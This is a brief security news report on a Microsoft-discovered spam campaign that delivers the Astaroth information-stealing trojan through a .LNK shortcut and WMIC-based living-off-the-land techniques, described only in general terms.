Microsoft has uncovered a sophisticated new spam campaign that is pushing the information stealing malware Astaroth. In order to avoid detection by anti-malware suites, the Astaroth Trojan is not directly attached to the spam messages, but is distributed via malicious scripts that take advantage of legitimate Windows tools, a tactic known as living-off-the-land.
The spam emails contain a link to a URL where a .LNK shortcut file is being hosted. Interacting with this file will launch the Windows Management Instrumentation Command-line (WMIC) tool, which will then launch other Windows tools, one of which eventually downloads Astaroth onto the targeted device.
Living-off-the-land attacks, also referred to as fileless attacks, are increasingly popular among threat actors because they are more difficult to detect.